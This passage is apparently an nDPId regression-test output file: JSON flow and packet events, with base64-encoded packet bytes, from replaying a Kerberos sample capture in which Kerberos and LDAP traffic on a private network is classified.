-00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337930219,"pkt":"AAgCHEeupB9ywglqCABFAAFEE1VAAIAGfW2sEAgIrBAIycADwA2zKyf0U0aPtVAYAQCiqgAABQAMBxAAAAAcAagAAgAAANAW0BaHIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbZHvDki757uIRa6348vky4CmSXJcuY8x7Y1L3GMPoboaFC4AmaVBuECBYLv9qMZx8MRhhEX3NAubRHjTv4BhutqH0onvuRNc5YNBgbuLmx\/PeM5pC\/bambRC96DP0B9XtGxHF5b6I04IhLGs2Ss="} -00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1549337930219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAF5AAIAGkKSsEAjJrBAICMANwANTRo+1syspEFAYAP\/w8AAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBEJ\/MyGgG2X9jllu+ZB+MxLzLgKVhkidSZOf9UFj0HoVGhQSTvPAIV6ETXdthgzo7fJnzn1QgLAxGW+unJjrxZzV2yGjHgQcBAQE\/\/\/\/\/\/8AAAAAToOoIEtcH3O\/XLUOvcMURw=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931189,"flow_last_seen":1549337931189,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931189,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1549337931189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931189,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAHBAAIAGkHysEAjJrBAICMARAYXGiPwnAgHw6FAYAQD72QAAHIAjHF8ymtjcD1VQuy4UgRChAu\/ekRMgcpsydbeCEgGc8O49XcEm2dIOQUYWz5jyNJ04mLjuLVb5JED7bXFEp0Ouk95kXWAsbhG+yaFiTruRiQNLefpIfBd02fAN9rH6kVBTVFVzTavxG5ZN46Q2CRurERdYtT07E7VAGTF+6yWhKn18+hUxFM5IXiI8jM4osfH687+lmO1gN\/3mr3cymHmPLwvBfLQ9P\/qJ62iSz72gALgVKjnTrFQYtji5UhDqTerpDdd7cbCpV4VyQehZ\/3jzwsKcVZtQElZtM7aiTvqbzIsK7RmP3EZFJoQ\/JIQyyhY="} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931190,"pkt":"AAgCHEeupB9ywglqCABFAAD6E2FAAIAGfausEAgIrBAIyQGFwBECAfDoxoj9GVAYAQDO8AAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1TTwhyAF9FVLbWTl8wTaD0aGMw9PDC0vNUorciel2CrkeZRTWRInWV74srNnVapF3vxPYDt7dvyfJVk888MzdKOasNrV1ijuwTfVJ0DIXj985iqAQmj9Mcte2ZOXgI6pFvWB0EEgpCluxB9enG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931198,"flow_last_seen":1549337931198,"flow_idle_time":7440000,"flow_min_l4_payload_len":113,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":113,"midstream":1,"thread_ts_msec":1549337931198,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1549337931198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1549337931198,"pkt":"pB9ywglqAAgCHEeuCABFAACZAHRAAIAGkPmsEAjJrBAICMASAFgkNdEgXsLgdFAYAQB+8gAAMUMT6Lk9nd3l4g7meOnydVZeUkzRDUCNbnZ+O2nc5UtCJOGQV8MBRj2azOMjgxpQ1tcViooap1+TILjpjhURvLMTREvy8WPkAKcvtuPHKbLtQ3Ir7HNN6Ftdy+KwiOrOLvSrSyEtUhWZxA6KOnwca9s="} -00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} -02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgpM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAINAAIAGkGmsEAjJrBAICMAUAYWVZlyUeqXAF1AYAQAMZQAAADzwgZ4odBCJHRYlGGakwQrZbcEXWu9XXnYRAfBS9UWuXk5Gs8yUHN3o80HZG8YpVlAE6+3ZtDtC+pUsrywDAW4RiWhUhsRgT1sEZ7Vtb++mdY4XtnskLm1\/a8GZzwfpptF0EbEM2x6OOlhhC6IhVJD1Y8p9M\/8ToLfUByDVk8u4C3VF8fyeQ0nd00U5YKsyBV8n8IUXdemUN+fgHev0R3Z+H9FwOZZ3xgduPU1Vapfbai\/N6Y9ZMkNd8RzvF1IldwQMemLuz0F0TTbyd784T8orT0ooc+nzAjFSSfg1FeelCx\/Q2\/iHKtSIZWhWBK\/UpxM="} -00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAACwE3FAAIAGfeWsEAgIrBAIyQBYwBWLIyaf550WwVAYAQCWAgAAAAAAhH6BgTB\/oAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OVqlBQIDDJwypgMCAQ2pEBsOSEFQUFlDUkFGVC5PUkeqJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6wZBBcwFaEDAgEDog4EDLsAAMAAAAAAAwAAAA=="} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAAD6E3RAAIAGfZisEAgIrBAIyQGFwBR6pcAXlWZdhlAYAQAZvwAAMIQAAADMAgEHYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG3yZsLFskNz2Tj8maOz7vLNMVSC3wBerc1xRFPj0GLDPGT9QlZRJav62bndhsIjLkgXNAdSqCa2GR8Luxe5TgJHZoIn44Is8Ku3wpqAc9pR3m8qLfoA6VkyZzzulSM2YJ4KniKJ4c7+rlJkc3DH"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931218,"flow_last_seen":1549337931218,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337931218,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1549337931218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337931218,"pkt":"pB9ywglqAAgCHEeuCABFAACxAI5AAIAGkMesEAjJrBAICMAXAFhuRvAsCoQzw1AYAQDQpAAAiAqFUHJzV5J+NXZTIhoIU8GbmBSxYcQbV4PW+ckPMTgFBw0KsYU9otlYXn6Tyj5\/BmOv8b2TCLvhZTzW6Z3PoLeUqFO88\/fWi+AgP8mYvV1NNCnNorn77cmRI2eXkDk7qLKlgMm4cUN+eWFUE7G2Z1e9ZdF2LM4CSirBRuN96IFr6Z0blZRnqpw="} -00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUk